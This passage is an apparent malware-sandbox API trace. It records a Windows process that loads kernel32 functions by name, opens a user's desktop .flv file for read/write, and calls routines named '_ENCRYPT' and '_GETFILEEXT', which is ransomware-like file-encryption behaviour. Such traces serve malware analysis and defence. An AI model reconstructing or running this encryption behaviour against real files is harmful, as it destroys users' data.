(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.098] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.100] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdae0 [0161.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdae0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.102] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.102] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.102] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.102] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0161.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.103] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0161.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.104] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.104] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.104] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.104] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.104] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.104] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0x90add8 [0161.105] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.106] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0x90add8 [0161.106] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.106] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 